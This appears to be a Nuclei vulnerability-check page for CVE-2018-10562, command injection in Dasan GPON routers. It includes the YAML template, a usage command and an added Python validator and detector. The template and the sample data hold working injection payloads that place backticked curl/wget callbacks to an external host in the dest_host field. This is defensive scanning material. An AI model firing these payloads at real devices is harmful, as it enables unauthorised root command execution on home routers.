Dasan GPON Devices - Remote Code Execution
ID: CVE-2018-10562
Severity: critical
Author: gy741
Tags: cve,cve2018,dasan,gpon,rce,oast,kev,dasannetworks
Description
Dasan GPON home routers are susceptible to command injection which can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it’s quite simple to execute commands and retrieve their output.
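The defensive counterpart of the description above, added here as an example that is not part of the original template or its references: a strict allow-list check for the dest_host value (the check a patched diag handler should apply) and a log-side detector that flags diag_Form ping requests whose target is anything but a hostname or IP literal. The sample request bodies and the callback.invalid host are constructed for the example.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# A ping target should only ever be an IP literal or a DNS hostname; anything
# else (backticks, ';', '|', spaces) is the command-injection shape described above.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$", re.IGNORECASE)


def is_valid_ping_target(value: str) -> bool:
    """Allow-list check a hardened diag handler should apply to dest_host."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return bool(HOSTNAME_RE.match(value))


def is_suspicious_diag_request(request_line: str, body: str) -> bool:
    """Flag a POST to /GponForm/diag_Form whose ping target is not a host/IP."""
    parts = request_line.split(" ")
    if len(parts) < 2 or parts[0] != "POST":
        return False
    if urlsplit(parts[1]).path != "/GponForm/diag_Form":
        return False
    params = parse_qs(body, keep_blank_values=True)  # decodes '+' and %XX
    if params.get("diag_action", [""])[0] != "ping":
        return False
    dest_host = params.get("dest_host", [""])[0]
    return not is_valid_ping_target(dest_host)


# Constructed sample requests (not captured traffic): a legitimate ping and an
# attempt shaped like the template on this page, with a placeholder callback host.
REQUEST_LINE = "POST /GponForm/diag_Form?images/ HTTP/1.1"
BENIGN_BODY = "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=8.8.8.8&ipv=0"
INJECTION_BODY = ("XWebPageName=diag&diag_action=ping&wan_conlist=0"
                  "&dest_host=`busybox+wget+http%3a//callback.invalid`;"
                  "busybox wget http://callback.invalid&ipv=0")

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("injection", INJECTION_BODY)):
        print(label, "flagged" if is_suspicious_diag_request(REQUEST_LINE, body) else "ok")
```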
YAML Source
id: CVE-2018-10562

info:
  name: Dasan GPON Devices - Remote Code Execution
  author: gy741
  severity: critical
  description: Dasan GPON home routers are susceptible to command injection which can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands with root privileges on the affected device.
  remediation: |
    Apply the latest firmware update provided by the vendor to mitigate this vulnerability.
  reference:
    - https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router
    - https://github.com/f3d0x0/GPON/blob/master/gpon_rce.py
    - https://nvd.nist.gov/vuln/detail/CVE-2018-10562
    - https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/
    - https://github.com/ethicalhackeragnidhra/GPON
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-10562
    cwe-id: CWE-78
    epss-score: 0.97423
    epss-percentile: 0.99934
    cpe: cpe:2.3:o:dasannetworks:gpon_router_firmware:-:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: dasannetworks
    product: gpon_router_firmware
  tags: cve,cve2018,dasan,gpon,rce,oast,kev,dasannetworks

variables:
  useragent: '{{rand_base(6)}}'

http:
  - raw:
      - |
        POST /GponForm/diag_Form?images/ HTTP/1.1
        Host: {{Hostname}}

        XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;busybox wget http://{{interactsh-url}}&ipv=0
      - |
        POST /GponForm/diag_Form?images/ HTTP/1.1
        Host: {{Hostname}}

        XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;wget http://{{interactsh-url}}&ipv=0

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: {{useragent}}"
# digest: 490a004630440220590c8ab09f58ffdf88c508ebf131b3517a69124c3bf9faca921d3a2d9a406e6b02200e1e4f94d6ca3ac13c887f7c008eb2c873672361a57e906ff19132763d1298d8:922c64590222798bb761d5b6d8e72950
Guide to check the vulnerabilities
This template checks a target for the vulnerability described above. Run it with the Nuclei tool against the URL of the device:
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-10562.yaml"